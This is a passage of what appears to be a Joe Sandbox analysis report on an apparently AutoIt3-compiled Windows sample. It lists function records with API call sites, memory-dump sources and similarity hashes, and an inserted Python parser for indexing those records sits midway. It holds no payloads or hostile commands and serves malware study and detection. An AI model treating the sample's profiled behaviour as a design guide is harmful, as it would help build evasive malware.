                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                                                                    • String ID: <$@
                                                                                                                    • API String ID: 2417854910-1426351568
                                                                                                                    • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                                                                    • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                                                                    • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                                                                    • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                                                                    APIs
                                                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                                                                      • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3705125965-3916222277
                                                                                                                    • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                                    • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                                                                    • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                                    • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
APIs
• GetMenuItemInfoW.USER32 ref: 0045FAC4
• DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
• DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Menu$Delete$InfoItem
• String ID: 0
• API String ID: 135850232-4108050209
• Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
• Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
• Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
• Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
• GetWindowLongW.USER32(?,000000F0), ref: 0045087D
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956
• Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
• Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
• Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
• Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
APIs
• LoadLibraryA.KERNEL32(?), ref: 00434B10
• GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
• FreeLibrary.KERNEL32(?), ref: 00434B9F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: AU3_GetPluginDetails
• API String ID: 145871493-4132174516
• Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
• Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
• Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
• Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
APIs
• SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: MessageSend$Window
• String ID: SysMonthCal32
• API String ID: 2326795674-1439706946
• Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
• Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
• Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
• Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
APIs
• DestroyWindow.USER32(00000000), ref: 00450A2F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: DestroyWindow
• String ID: msctls_updown32
• API String ID: 3375834691-2298589950
• Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
• Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
• Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
• Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: _memmove
• String ID: $<
• API String ID: 4104443479-428540627
• Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
• Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
• Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
• Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D79D
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID: \VH
• API String ID: 1682464887-234962358
• Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
• Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
• Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
• Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
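These per-function records (API call sites, Strings, Memory Dump Source, Similarity hashes) are far easier to pivot on across samples once they are parsed rather than read. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses records in the layout shown here, indexes every call site by API name, collapses a function that the report lists more than once (the SetErrorMode/GetDiskFreeSpaceExW function at 0045D79D appears twice in this report), and flags functions that pair LoadLibrary* with GetProcAddress, returning the export name the sandbox resolved for the lookup. In this report that name is AU3_GetPluginDetails, the export queried by the AutoIt3 plugin interface, so the flagged function is the interpreter's plugin loader. The embedded sample text is constructed from the records on this page, with the Associated lines dropped and the Opcode fields omitted; the regexes assume the exact `Name.MODULE(args), ref: ADDR` layout shown (the `GetMenuItemInfoW.USER32 ref:` form without an argument list is handled too).

```python
"""Parse Joe Sandbox per-function records into structured rows.

Added example; assumes the 'APIs / Strings / Memory Dump Source /
Joe Sandbox IDA Plugin / Similarity' block layout seen in the report.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: four records copied from the report, trimmed to the
# fields used below. The last record is a verbatim repeat of the third, as in
# the report itself, and is cut off after 'Strings' just as the page is.
SAMPLE = r"""APIs
• LoadLibraryA.KERNEL32(?), ref: 00434B10
• GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
• FreeLibrary.KERNEL32(?), ref: 00434B9F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: AU3_GetPluginDetails
• API String ID: 145871493-4132174516
• Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
APIs
• GetMenuItemInfoW.USER32 ref: 0045FAC4
• DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
• DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
Strings
Similarity
• API ID: Menu$Delete$InfoItem
• String ID: 0
• Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D79D
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
Strings
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID: \VH
• Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D79D
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
Strings
"""

# 'Name.MODULE(args), ref: ADDR' or 'Name.MODULE ref: ADDR' (no argument list).
API_RE = re.compile(
    r"^• (?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\),)? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
FIELD_RE = re.compile(r"^• (?P<key>[^:]+): ?(?P<value>.*)$")
SECTION_HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiCall:
    name: str         # e.g. GetProcAddress
    module: str       # e.g. KERNEL32
    args: list[str]   # argument column as printed; '?' means the sandbox could not resolve it
    ref: int          # call-site address


@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    dump: dict[str, list[str]] = field(default_factory=dict)   # Memory Dump Source / IDA Plugin fields
    similarity: dict[str, str] = field(default_factory=dict)   # API ID, String ID, hashes

    @property
    def instruction_id(self) -> str:
        return self.similarity.get("Instruction ID", "")


def parse_records(text: str) -> list[FunctionRecord]:
    """Split the report text into one FunctionRecord per 'APIs' block."""
    records: list[FunctionRecord] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":                      # every record starts here
            records.append(FunctionRecord())
            section = "apis"
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if not records:                         # text before the first record
            continue
        rec = records[-1]
        if section == "apis":
            m = API_RE.match(line)
            if m:
                args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
                rec.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16)))
        elif section == "Strings":
            rec.strings.append(line.lstrip("• "))
        elif section == "Similarity":
            m = FIELD_RE.match(line)
            if m:
                rec.similarity[m["key"].strip()] = m["value"].strip()
        else:                                   # Memory Dump Source / Joe Sandbox IDA Plugin
            m = FIELD_RE.match(line)
            if m:                               # 'Associated' repeats, so values are kept as a list
                rec.dump.setdefault(m["key"].strip(), []).append(m["value"].strip())
    return records


def dedupe_by_call_sites(records: list[FunctionRecord]) -> list[FunctionRecord]:
    """Keep one record per distinct set of (API, call-site) pairs: two records with
    identical call sites describe the same function even if one is truncated."""
    seen: set = set()
    out: list[FunctionRecord] = []
    for rec in records:
        if not rec.apis and not rec.instruction_id:
            out.append(rec)                     # nothing to key on; keep it
            continue
        key = tuple(sorted((c.name, c.ref) for c in rec.apis)) or rec.instruction_id
        if key not in seen:
            seen.add(key)
            out.append(rec)
    return out


def index_by_api(records: list[FunctionRecord]) -> dict[str, list[str]]:
    """Map API name -> sorted call-site addresses (8-digit hex, as the report prints them)."""
    index: dict[str, list[str]] = {}
    for rec in records:
        for call in rec.apis:
            index.setdefault(call.name, []).append(f"{call.ref:08X}")
    return {name: sorted(refs) for name, refs in index.items()}


def dynamic_resolvers(records: list[FunctionRecord]) -> list[tuple[str, list[str]]]:
    """Functions pairing LoadLibrary* with GetProcAddress, with the export names the
    sandbox resolved for the lookup (GetProcAddress's second argument when not '?')."""
    found = []
    for rec in records:
        names = {c.name for c in rec.apis}
        if "GetProcAddress" in names and any(n.startswith("LoadLibrary") for n in names):
            exports = [c.args[1] for c in rec.apis
                       if c.name == "GetProcAddress" and len(c.args) > 1 and c.args[1] != "?"]
            found.append((rec.instruction_id, exports))
    return found


if __name__ == "__main__":
    recs = dedupe_by_call_sites(parse_records(SAMPLE))
    print(f"{len(recs)} distinct functions")
    for api, refs in sorted(index_by_api(recs).items()):
        print(f"{api:22s} {' '.join(refs)}")
    for iid, exports in dynamic_resolvers(recs):
        print(f"dynamic import resolver {iid[:16]}... resolves {exports}")
```

Feed the function-block text of a full report to `parse_records` and the Instruction ID and Opcode ID columns give per-function keys for diffing two analyses of the same family; the `dump` dictionary keeps the Source File and Associated dumps so a hit can be traced back to the specific memory region the function was carved from.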
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D79D
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID: \VH
• API String ID: 1682464887-234962358
• Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
• Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
• Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
• Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D87B
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID: \VH
• API String ID: 1682464887-234962358
• Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
• Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
• Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
• Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D37E
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: \VH
• API String ID: 2507767853-234962358
• Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
• Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
• Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
• Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D55C
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: \VH
• API String ID: 2507767853-234962358
• Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
• Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
• Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
• Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
• SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
• Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
